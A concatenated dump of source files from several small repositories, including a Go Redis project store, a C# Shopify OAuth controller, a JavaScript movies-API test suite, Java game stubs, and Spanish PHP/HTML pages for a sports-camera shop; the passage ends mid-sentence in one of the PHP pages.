func (s *RedisStore) FindByApiKey(apiKey string) (*Project, error) {
s.Lock()
defer s.Unlock()
// Find local reference to project.
p := s.projects[apiKey]
// If project doesn't exist then find it from Redis.
if p == nil {
// Find project from Redis.
reply, err := s.conn.Do("HGET", s.HashKey(), apiKey)
if err != nil {
return nil, err
}
// Create project based on reply.
if reply, ok := reply.(string); ok {
table, err := s.client.GetTable(reply)
if err != nil {
return nil, err
}
p = New(apiKey, table)
s.projects[apiKey] = p
} else {
return nil, fmt.Errorf("Project not found: %s (%v)", apiKey, reply)
}
}
return p, nil
}
<file_sep>/core/user.go
package core
type User struct {
Id string `json:"id"`
Traits map[string]interface{} `json:"traits"`
}
<file_sep>/projects/project.go
package projects
import (
"github.com/skydb/sky.go"
"github.com/skylandlabs/landmarkd/core"
)
// A Project is a collection of users and their events. In the landmarkd
// process, a Project simply links API keys to the table the project is
// stored on.
type Project struct {
ApiKey string
table sky.Table
}
// Creates a new Project.
func New(apiKey string, table sky.Table) *Project {
return &Project{
ApiKey: apiKey,
table: table,
}
}
// Tracks an event.
func (p *Project) Track(user *core.User, device *core.Device, event *core.Event) error {
// TODO: Create a Sky event.
// TODO: Save to Sky.
return nil
}
<file_sep>/projects/redis_store_test.go
package projects
import (
"github.com/stretchr/testify/assert"
"testing"
)
func newRedisStore() (*RedisStore, *mockRedisConn, *mockSkyClient, *mockSkyTable) {
table := new(mockSkyTable)
client := new(mockSkyClient)
conn := new(mockRedisConn)
s, err := NewStore(client, "redis://localhost:6379")
if err != nil {
panic(err)
}
store := s.(*RedisStore)
store.conn = conn
return store, conn, client, table
}
// Ensure that the store will find a project by API key and cache it.
func TestRedisStoreFindByApiKey(t *testing.T) {
store, conn, client, table := newRedisStore()
client.On("GetTable", "myTable").Return(table, nil)
conn.On("Do", "HGET", []interface{}{"ldmk_projects", "XXX"}).Return("myTable", nil)
// Search for a project by API key.
p, err := store.FindByApiKey("XXX")
assert.Nil(t, err)
assert.Equal(t, p.ApiKey, "XXX")
assert.Equal(t, p.table, table)
// Search for the same project. Should receive cached copy.
p2, err := store.FindByApiKey("XXX")
assert.Nil(t, err)
assert.Equal(t, p, p2)
client.AssertExpectations(t)
conn.AssertExpectations(t)
}
| 7606b4feb3a8587a08c9a4359edae8eaf3631502 | [
"Markdown",
"Go"
] | 13 | Go | Kuew/landmarkd | b10823de4e69771f63701876cf17331cf8b3adc8 | 034a781489a9f40cd9196b2859de1e7f83ae8181 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.Json.Serialization;
using System.Threading.Tasks;
namespace Shopify_HelloWorld_dotNet.Models
{
public class WebHookSubscriptionRequest
{
public WebHook webhook { get; set; }
}
public class WebHook
{
public string topic { get; set; }
public string address { get; set; }
public string format { get; set; }
}
}
<file_sep>using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Logging;
using Shopify_HelloWorld_dotNet.Models;
using System;
using System.Collections;
using System.IO;
using System.Linq;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Security.Cryptography;
using System.Text;
using System.Text.Json;
using System.Threading.Tasks;
using System.Web;
namespace Shopify_HelloWorld_dotNet.Controllers
{
[ApiController]
public class DefaultController : ControllerBase
{
private readonly ILogger<DefaultController> _logger;
private readonly IConfiguration _config;
private const string scopes = "read_products";
private readonly HttpClient _client;
public DefaultController(ILogger<DefaultController> logger, IConfiguration config)
{
_logger = logger;
_config = config;
_client = new HttpClient();
}
[HttpGet]
[Route("/")]
public ActionResult Callback()
{
return new JsonResult("Hello World");
}
[HttpGet]
[Route("shopify")]
public ActionResult Install([FromQuery] string shop)
{
var callbackUrl = _config["CallbackUrl"];
var apiKey = _config["ApiKey"];
var nonce = CreateNonce();
var redirectUri = $"{callbackUrl}/shopify/callback";
var installUri = $"https://{shop}/admin/oauth/authorize?client_id={apiKey}&scope={scopes}&state={nonce}&redirect_uri={redirectUri}";
HttpContext.Response.Cookies.Append("state", nonce);
return Redirect(installUri);
}
[HttpGet]
[Route("shopify/callback")]
public async Task<ActionResult> Callback([FromQuery] string shop, [FromQuery] string hmac, [FromQuery] string code, [FromQuery] string state)
{
var nonce = HttpContext.Request.Cookies["state"];
if (!state.Equals(nonce))
{
return Unauthorized("Request origin cannot be verified");
}
var apiSecret = _config["ApiSecret"];
var apiKey = _config["ApiKey"];
//Validate hmac
var validateQueryString = HttpUtility.ParseQueryString(HttpContext.Request.QueryString.Value);
validateQueryString.Remove("hmac");
//Sort the keys lexographically
var sortedKeys = validateQueryString.AllKeys.OrderBy(r => r);
var parsedQueryString = new StringBuilder();
foreach (var key in sortedKeys)
{
parsedQueryString.Append($"&{key}={validateQueryString[key]}");
}
//Remove the first &
parsedQueryString.Remove(0, 1);
var hashedQueryString = HashHMAC(StringEncode(apiSecret), StringEncode(parsedQueryString.ToString()));
if (!hashedQueryString.Equals(hmac, StringComparison.OrdinalIgnoreCase))
{
return Unauthorized("HMAC is invalid");
}
//Get an access token
var response = await _client.PostAsync($"https://{shop}/admin/oauth/access_token", new StringContent(
JsonSerializer.Serialize<TokenRequestPayload>(new TokenRequestPayload()
{
client_id = apiKey,
client_secret = apiSecret,
code = code
}), Encoding.UTF8, "application/json"));
if (response.IsSuccessStatusCode)
{
var responseData = JsonSerializer.Deserialize<TokenResponsePayload>(await response.Content.ReadAsStringAsync());
return new JsonResult(await CreateWebHookSubscription(responseData.access_token, shop));
}
return new JsonResult("Something went wrong!");
}
[HttpPost]
[Route("shopify/newcart")]
public async Task<ActionResult> NewProduct()
{
using (var reader = new StreamReader(Request.Body))
{
var body = await reader.ReadToEndAsync();
}
return Ok();
}
private async Task<string> GetShopDataAsync(string accessToken, string shop)
{
using (var requestMessage =
new HttpRequestMessage(HttpMethod.Get, $"https://{shop}/admin/api/2020-04/shop.json"))
{
requestMessage.Headers.TryAddWithoutValidation("X-Shopify-Access-Token", accessToken);
var response = await _client.SendAsync(requestMessage);
if (response.IsSuccessStatusCode)
{
return await response.Content.ReadAsStringAsync();
}
}
return string.Empty;
}
private async Task<string> CreateWebHookSubscription(string accessToken, string shop)
{
var apiSecret = _config["ApiSecret"];
var apiKey = _config["ApiKey"];
var callbackUrl = _config["CallbackUrl"];
using (var requestMessage =
new HttpRequestMessage(HttpMethod.Post, $"https://{shop}/admin/api/2020-04/webhooks.json"))
{
requestMessage.Headers.TryAddWithoutValidation("X-Shopify-Access-Token", accessToken);
requestMessage.Content = new StringContent(
JsonSerializer.Serialize<WebHookSubscriptionRequest>(new WebHookSubscriptionRequest()
{
webhook = new WebHook()
{
address = $"{callbackUrl}/shopify/newcart",
format = "json",
topic = "products/create"
}
}), Encoding.UTF8, "application/json");
var response = await _client.SendAsync(requestMessage);
return await response.Content.ReadAsStringAsync();
}
}
private string CreateNonce()
{
var ByteArray = new byte[20];
using (var Rnd = RandomNumberGenerator.Create())
{
Rnd.GetBytes(ByteArray);
}
return Convert.ToBase64String(ByteArray);
}
private string HashHMAC(byte[] key, byte[] message)
{
var hash = new HMACSHA256(key);
return BitConverter.ToString(hash.ComputeHash(message)).Replace("-", "").ToLower();
}
private byte[] StringEncode(string text)
{
var encoding = new UTF8Encoding();
return encoding.GetBytes(text);
}
}
}
| 66817b3a248061b114f424a6be4864fc94a57570 | [
"C#"
] | 2 | C# | sstefanovich/shopify-hello-world-dotnet | ae1ecf0e7ba3a306f0934d792965cb98564b1a87 | 05d0fedee71b33dfc8d242620b64eff64d78ed8b |
refs/heads/master | <repo_name>fossabot/movies-api<file_sep>/test/index.test.js
/* eslint-disable */
let chai = require('chai')
let expect = chai.expect
let request = require('supertest')
let server = require('../index')
describe('GET /movies', () => {
it('works with no parameters', done => {
request(server)
.get('/movies')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works with limit 5', done => {
request(server)
.get('/movies?limit=5')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
const length = res.body.length
expect(length).to.be.at.most(5)
done()
})
.catch(err => {
console.error(err)
})
})
it('works with limit 0', done => {
request(server)
.get('/movies?limit=0')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect('Content-Length', '2')
.expect(200)
.then(res => {
expect(res.body.length).to.be.equal(0)
done()
})
.catch(err => {
console.error(err)
})
})
it('works with negative limit', done => {
request(server)
.get('/movies?limit=-5')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works with only title field', done => {
request(server)
.get('/movies?fields=Title')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
expect(res.body[0]).to.have.keys('Title')
done()
})
.catch(err => {
console.error(err)
})
})
it('works with only plot field', done => {
request(server)
.get('/movies?fields=Plot')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
expect(res.body[0]).to.have.keys('Plot')
done()
})
.catch(err => {
console.error(err)
})
})
it('works with unknown fields', done => {
request(server)
.get('/movies?fields=Plsgsot')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works with sorting', done => {
request(server)
.get('/movies?sort=Year')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
expect(parseInt(res.body[0].Year)).to.be.at.most(parseInt(res.body[1].Year))
done()
})
.catch(err => {
console.error(err)
})
})
it('does its job with bizarre data', done => {
request(server)
.get('/movies?hakunamatata=dontworry')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
})
describe('POST /movies', () => {
it('throws error on no paramaters', done => {
request(server)
.post('/movies')
.expect(400, done)
})
it('adds movie to the database', done => {
request(server)
.post('/movies')
.send('title=Jaws')
.expect('Content-Type', 'application/json; charset=utf-8')
.then(res => {
const body = res.body
expect(res.status).to.be.oneOf([200, 201])
expect(body.Title).to.equal('Jaws')
expect(body.Year).to.equal('1975')
expect(body.Rated).to.equal('PG')
expect(body.Response).to.equal('True')
done()
})
.catch(err => {
console.error(err)
})
})
it('throws error when movie not found', done => {
request(server)
.post('/movies')
.send('title=asjdofjhuishadfadfiodsi')
.expect(404, done)
})
it('works fine with strange data', done => {
request(server)
.post('/movies')
.send('title=Jaws')
.send('ihearthedrums=echoingtonight')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
const body = res.body
expect(body.Title).to.equal('Jaws')
expect(body.Year).to.equal('1975')
expect(body.Rated).to.equal('PG')
expect(body.Response).to.equal('True')
done()
})
.catch(err => {
console.error(err)
})
})
})
describe('GET /comments', () => {
it('works with no parameters', done => {
request(server)
.get('/comments')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works with limit 5', done => {
request(server)
.get('/comments?limit=5')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
const length = res.body.length
expect(length).to.be.at.most(5)
done()
})
.catch(err => {
console.error(err)
})
})
it('works with limit 0', done => {
request(server)
.get('/comments?limit=0')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect('Content-Length', '2')
.expect(200)
.then(res => {
expect(res.body.length).to.be.equal(0)
done()
})
.catch(err => {
console.error(err)
})
})
it('works with negative limit', done => {
request(server)
.get('/comments?limit=-10')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works with only content field', done => {
request(server)
.get('/comments?fields=content')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200)
.then(res => {
expect(res.body[0]).to.have.keys('content')
done()
})
.catch(err => {
console.error(err)
})
})
it('works with unknown fields', done => {
request(server)
.get('/movies?fields=Pizza')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
it('works fine with strange data', done => {
request(server)
.get('/comments?whoareyou=thewinner')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(200, done)
})
})
describe('POST /comments', () => {
it('throws an error while no arguments', done => {
request(server)
.post('/comments')
.expect(400, done)
})
it('throws an error while no movie ID', done => {
request(server)
.post('/comments')
.send('content=Bizzaire!')
.expect(400, done)
})
it('throws an error while no content', done => {
request(server)
.post('/comments')
.send('movie=2')
.expect(400, done)
})
it('throws 404 when no movie found', done => {
request(server)
.post('/comments')
.send('content=Obnoxious!')
.send('movie=777')
.expect(404, done)
})
it('works fine when it should to', done => {
request(server)
.post('/comments')
.send('movie=2')
.send('content=Bizzare!')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(201)
.then(res => {
expect(res.body).to.have.keys('movieID', 'content')
done()
})
.catch(err => {
console.error(err)
})
})
it('works fine with strange data', done => {
request(server)
.post('/comments')
.send('movie=2')
.send('content=Bizzare!')
.send('shouldyouhireme=yesplz')
.expect('Content-Type', 'application/json; charset=utf-8')
.expect(201)
.then(res => {
expect(res.body).to.have.keys('movieID', 'content')
done()
})
.catch(err => {
console.error(err)
})
})
})
| 458ef7a0d7e00fecc7cac39749834a25356036ff | [
"JavaScript"
] | 1 | JavaScript | fossabot/movies-api | b31cb45930af4acf632be43e2d2868220594be49 | 95d5e318ccbee332853fd54c4003927e57fd07f8 |
refs/heads/master | <repo_name>TA2014Cooperation/V1<file_sep>/src/Simon/Character.java
package Simon;
public class Character {
String Name;
int STR;
int INT;
int VERT;
int HP;
int[][] Position;
public String getName() {
return Name;
}
public void setName(String name) {
Name = name;
}
public int getSTR() {
return STR;
}
public void setSTR(int sTR) {
STR = sTR;
}
public int getINT() {
return INT;
}
public void setINT(int iNT) {
INT = iNT;
}
public int getVERT() {
return VERT;
}
public void setVERT(int vERT) {
VERT = vERT;
}
public int getHP() {
return HP;
}
public void setHP(int hP) {
HP = hP;
}
public int[][] getPosition() {
return Position;
}
public void setPosition(int[][] position) {
Position = position;
}
// int Attack = STR + (10*INT)/STR;
// int Abwehr = (int) (VERT + (0.25 * INT));
}
<file_sep>/README.md
Adventure Ideen Sammlung:
- Karte
- NPC
- Stats
- Items
-
<file_sep>/src/Adventure/Kampf.java
package Adventure;
public class Kampf {
//Abwehren
public static boolean abwehren(int STG, int INT, int VERT){
if (STG==0){
STG=2;
}
return false;
}
}
<file_sep>/src/Adventure/Main.java
package Adventure;
public class Main {
public static void main(String[] args){
//READ
//PROCESS
//WRITE
}
public void Ausgabe(){
//Vorgefertigte Standatisierte Ausgabe (genau 25 Zeilen sind möglich)
}
}
<file_sep>/src/Adventure/Karte.java
package Adventure;
public class Karte {
}
| 2ba6da4b7de933a58b1606b2723fe09c2134d4f8 | [
"Markdown",
"Java"
] | 5 | Java | TA2014Cooperation/V1 | 9b86b0c0167d7e98810f3774fa9ca0e10f44d138 | 7cf7d8e6697bb1a7d6e8a6a3016ae3f6df39dd3f |
refs/heads/master | <file_sep><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<title>Ayuda</title>
</head>
<body>
<!-- En esta parte va lo que es el nav que esta fijo -->
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!--Esta es la seccion de ayuda -->
<!-- Aqui va la historia de la empresa -->
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">Ayuda</h1>
<p class="lead">En esta seccion vemos las preguntas mas frecuentes que se presentan cuando entras a la pagina.
<br><br>
<b>¿Como hago para comprar una camara?</b>
<br>
Respuesta: Nuestra pagina esta hecha para que de una manera simple y sencilla puedas
adquirir nuestros productos eficazmente.
<br><br>
<b>¿Mis productos me llegan a casa?</b>
<br>
Respuesta: Los productos adquiridos te llegan completamente seguros a tu casa en el timepo estimado de compra.
<br>
<br>
<b>¿Que productos cubren la garantia?</b>
<br>
Respuesta: Todos nuestros productos tienen garantia de un plazo de un mes, si el producto te llega
defectuoso, la empresa se hace cargo de hacerte de inmediato un cambio de producto.
De acuerdo con el nuestras normas y politicas de la empresa tiene que pasa un procedimiento de revision
para ver si el producto realmente esta malo.<br><br>
Informar sobre infracciones de nuestras políticas
Investigamos las infracciones de nuestras políticas e insistimos en que se den las explicaciones pertinentes. Si identificas una infracción, indícanoslo inmediatamente.
Ejemplos de infracción de nuestras políticas:<br><br>
Un comprador no paga un artículo.<br><br>
Se realiza una oferta para completar la transacción fuera de eBay.<br><br>
Un usuario envía correo no solicitado (spam) a otro.<br><br>
Infracciones de los derechos de propiedad intelectual y marcas registradas.<br><br>
Un comprador amenaza con darte una valoración negativa si no cumples determinadas peticiones.
<br><br>
<b>¿Como hago para comprar una camara?</b>
<br>
Respuesta: Nuestra pagina esta hecha para que de una manera simple y sencilla puedas
adquirir nuestros productos eficazmente.
</p>
</div>
</div>
<!-- -->
<!-- Va el footer que lo manda a llamar -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep><?php
/*Creamos una clase con una funcion que imprime el codigo html del nav
para ahorrar codigo y colocar el nav */
class basefooter{
static function bfooter(){
print('
<footer id="footer" class="page-footer font-small pt-4 text-white">
<!-- Footer Links -->
<div class="container text-center text-md-left">
<!-- Footer links -->
<div class="row text-center text-md-left mt-3 pb-3">
<!-- Grid column -->
<div class="col-md-3 col-lg-3 col-xl-3 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">FocusView</h6>
<p>Si realmente eres amante de los deporte entonces compra algo que te dejara recuerdos
en todo momento y que siempre seras un gran deportista...
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div id="link" class="col-md-2 col-lg-2 col-xl-2 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Productos</h6>
<p>
<a href="#!">FocusView Mercury</a>
</p>
<p>
<a href="#!">FocusView XS</a>
</p>
<p>
<a href="#!">FocusView Xpro</a>
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div id="link" class="col-md-3 col-lg-2 col-xl-2 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Links mas usados</h6>
<p>
<a href="https://www.facebook.com/">Facebook</a>
</p>
<p>
<a href="https://www.youtube.com/">Youtube</a>
</p>
<p>
<a href="https://www.instagram.com/?hl=es-la">Instagram</a>
</p>
<p>
<a href="https://twitter.com/?lang=es">Twitter</a>
</p>
</div>
<!-- Grid column -->
<hr class="w-100 clearfix d-md-none">
<!-- Grid column -->
<div class="col-md-4 col-lg-3 col-xl-3 mx-auto mt-3">
<h6 class="text-uppercase mb-4 font-weight-bold">Contáctenos</h6>
<p>
<i class="fas fa-home mr-3"></i> San Salvador, SV 10012, ES</p>
<p>
<i class="fas fa-envelope mr-3"></i><EMAIL></p>
<p>
<i class="fas fa-phone mr-3"></i> + 503 77213922</p>
<p>
<i class="fas fa-print mr-3"></i> + 503 78321389</p>
</div>
<!-- Grid column -->
</div>
<!-- Footer links -->
<hr>
<!-- Grid row -->
<div class="row d-flex align-items-center">
<!-- Grid column -->
<div class="col-md-7 col-lg-8">
<!--Copyright-->
<p class="text-center text-md-left">© 2018 Copyright:
<strong >FocusView.com</strong>
</a>
</p>
</div>
<!-- Grid column -->
<!-- Grid column -->
<div class="col-md-5 col-lg-4 ml-lg-0">
<!-- Social buttons -->
<div class="text-center text-md-right">
<ul class="list-unstyled list-inline">
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-facebook-f"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-twitter"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-google-plus-g"></i>
</a>
</li>
<li class="list-inline-item">
<a class="btn-floating btn-sm rgba-white-slight mx-1">
<i class="fab fa-linkedin-in"></i>
</a>
</li>
</ul>
</div>
</div>
<!-- Grid column -->
</div>
<!-- Grid row -->
</div>
<!-- Footer Links -->
</footer>
');
}
}
<file_sep><!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<link rel="alternate" href="atom.xml" type="application/atom+xml" title="Atom">
<title>Este carlos</title>
</head>
<body>
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!--Esta parte es la del carousel-->
< <div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel">
<ol class="carousel-indicators">
<li data-target="#carouselExampleIndicators" data-slide-to="0" class="active"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
<li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
<div class="carousel-item">
<img src="../../resources/img/camara2.jpg" class="d-block w-100" alt="...">
</div>
</div>
<a class="carousel-control-prev" href="#carouselExampleIndicators" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
<a class="carousel-control-next" href="#carouselExampleIndicators" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
<!--En esta parte va un pequeño contenedor para las camaras mas vendidas-->
<br><br><br><br>
<div class="container">
<div class="row">
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView Mercury</h5>
<p class="card-text">Camara mercury especial para los deportes extremos con resistencia a todo tipo de climas</p>
<form id="form">
<p class="clasificacion">
<input id="radio1" type="radio" name="estrellas" value="5"><!--
--><label for="radio1">★</label><!--
--><input id="radio2" type="radio" name="estrellas" value="4"><!--
--><label for="radio2">★</label><!--
--><input id="radio3" type="radio" name="estrellas" value="3"><!--
--><label for="radio3">★</label><!--
--><input id="radio4" type="radio" name="estrellas" value="2"><!--
--><label for="radio4">★</label><!--
--><input id="radio5" type="radio" name="estrellas" value="1"><!--
--><label for="radio5">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">Comprar</a>
</div>
</div>
</div>
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo2.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView Pro</h5>
<p class="card-text">Camara de alta calidad que graba a 4k con resistencia al agua y al polvo</p>
<br>
<form id="form">
<p class="clasificacion">
<input id="radio6" type="radio" name="estrellas" value="5"><!--
--><label for="radio6">★</label><!--
--><input id="radio7" type="radio" name="estrellas" value="4"><!--
--><label for="radio7">★</label><!--
--><input id="radio8" type="radio" name="estrellas" value="3"><!--
--><label for="radio8">★</label><!--
--><input id="radio9" type="radio" name="estrellas" value="2"><!--
--><label for="radio9">★</label><!--
--><input id="radio10" type="radio" name="estrellas" value="1"><!--
--><label for="radio10">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">LAS COMPRASSSSSSSSSSSS</a>
</div>
</div>
</div>
<div class="col-sm">
<div id="cd" class="card text-center" style="width: 18rem;">
<img src="../../resources/img/camaralogo.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title">FocusView XPro</h5>
<p class="card-text">Camara especializada al agua, sumergible hasta 30 metros de profundidad</p>
<form id="form">
<p class="clasificacion">
<input id="radio11" type="radio" name="estrellas" value="5"><!--
--><label for="radio11">★</label><!--
--><input id="radio12" type="radio" name="estrellas" value="4"><!--
--><label for="radio12">★</label><!--
--><input id="radio13" type="radio" name="estrellas" value="3"><!--
--><label for="radio13">★</label><!--
--><input id="radio14" type="radio" name="estrellas" value="2"><!--
--><label for="radio14">★</label><!--
--><input id="radio15" type="radio" name="estrellas" value="1"><!--
--><label for="radio15">★</label>
</p>
</form>
<a href="#" class="btn btn-primary">Comprar</a>
</div>
</div>
</div>
</div>
</div>
<br><br><br><br><br>
<!--Esta parte es para otro header-->
<div id="link" class="card text-center white-text" style="background-color: #585858">
<div class="card-body">
<ul class="nav justify-content-center">
<li class="nav-item">
<a class="nav-link active" href="#">Activo</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Enlazar</a>
</li>
<li class="nav-item">
<a class="nav-link active" href="#">Nuevos Productos</a>
</li>
<li class="nav-item">
<a class="nav-link disable" href="#" tabindex="-1" aria-disable="true">Discapacitado</a>
</li>
</ul>
</div>
</div>
<br><br>
<!-- Parte de las categorias -->
<br>
<div class="container">
<div class="row">
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title"><br>Accesorios</h5>
<p class="card-text"><br>Camara mercury especial para los deportes extremos con resistencia a todo tipo de climas</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria2.jpg" class="card-img-top" alt="...">
<div class="card-body">
<h5 class="card-title"><br>Tripodes APURATE CARLOSSSSSSSSSSSSSSS</h5>
<p class="card-text"><br><br>Camara de alta calidad que graba a 4k con resistencia al agua y al polvo</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/categoria5.jpg" class="card-img-top" alt="..." >
<div class="card-body">
<h5 class="card-title">Extremo de </h5>
<p class="card-text">Camara especializada para ver cambios de git, sumergible hasta 30 metros de profundidad</p>
<a href="#" class="btn btn-primary">Visualizar</a>
</div>
</div>
</div>
</div>
</div>
<!-- En esta parte va el quienes somos -->
<br><br><br>
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">¿Quienes Somos?</h1>
<p class="lead">Nuestro Team de FocusView es completamente increible hace que todo lo que compres sea de una manera unica.</p>
</div>
</div>
<!-- En esta parte va sobre nosotros personas que ayudaron a la pagina -->
<br>
<div class="container">
<div class="row">
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/gerar3.jpg" class="card-img-top" alt="...">
<div class="card-body">
<p class="card-text"><b>"Siempre creí que el exito se alcanza logrando todo lo que te propongas"</b><br><br><NAME>.</p>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/eze2.jpg" class="card-img-top" alt="..." width="" height="280">
<div class="card-body">
<p class="card-text"><b>"La mayoria de personas piensan que no pueden lograr las cosas por si mismos, yo les digo el que no arriesga no gana"</b><br><br><NAME></p>
</div>
</div>
</div>
<div class="col-sm">
<div class="card" style="width: 18rem;">
<img src="../../resources/img/carlos2.jpg" class="card-img-top" alt="..." width="" height="280">
<div class="card-body">
<p class="card-text"><b>“Las oportunidades no pasan, las creas, He fallado una y otra vez y es por ello que he tenido éxito”</b><br><br><NAME></p>
</div>
</div>
</div>
</div>
</div>
</div>
<br><br>
<!-- En esta parte se encuentra el footer de la pagina -->
<!-- Footer -->
<?php
require('../../core/models/basefooter.php');
basefooter::bfooter();
?>
<!-- Footer -->
<!-- Esta parte es el footer de la pagina donde se encuentran nuestras redes sociales -->
<script src="../../resources/js/jquery-3.2.1.slim.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script src="../../resources/js/popper.min.js"></script>
<script src="../../resources/js/bootstrap.min.js"></script>
</body>
</html><file_sep><?php
class estrellas{
static function estrella(){
print('
<form id="form">
<p class="clasificacion">
<input id="radio1" type="radio" name="estrellas" value="5"><!--
--><label for="radio1">★</label><!--
--><input id="radio2" type="radio" name="estrellas" value="4"><!--
--><label for="radio2">★</label><!--
--><input id="radio3" type="radio" name="estrellas" value="3"><!--
--><label for="radio3">★</label><!--
--><input id="radio4" type="radio" name="estrellas" value="2"><!--
--><label for="radio4">★</label><!--
--><input id="radio5" type="radio" name="estrellas" value="1"><!--
--><label for="radio5">★</label>
</p>
</form>
');
}
}<file_sep><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="../../resources/css/bootstrap.min.css">
<link rel="stylesheet" href="../../resources/css/estilos.css">
<title>Quienes Somos</title>
</head>
<body>
<!-- En esta parte va lo que es el nav que esta fijo -->
<?php
require('../../core/models/baseheader.php');
baseheader::bhead();
?>
<!-- Una barra -->
<div class="shadow p-3 mb-5 bg-white rounded"></div>
<!-- Aqui va la historia de la empresa -->
<div id="nosotros" class="jumbotron jumbotron-fluid">
<div class="container">
<h1 class="display-4">Quienes Somos</h1>
<p class="lead">Nuestro Team de FocusView es completamente increible hace que todo lo que compres sea de una manera unica.
<br><br> Nosotros nos encargamos de Proporcionar a la comunidad deportiva cámaras de alta gama al mismo tiempo tendrán un registro de todo lo que han hecho mientras realizan estas actividades, esta empresa FocusView funcionara vendiendo cámaras deportivas resistentes
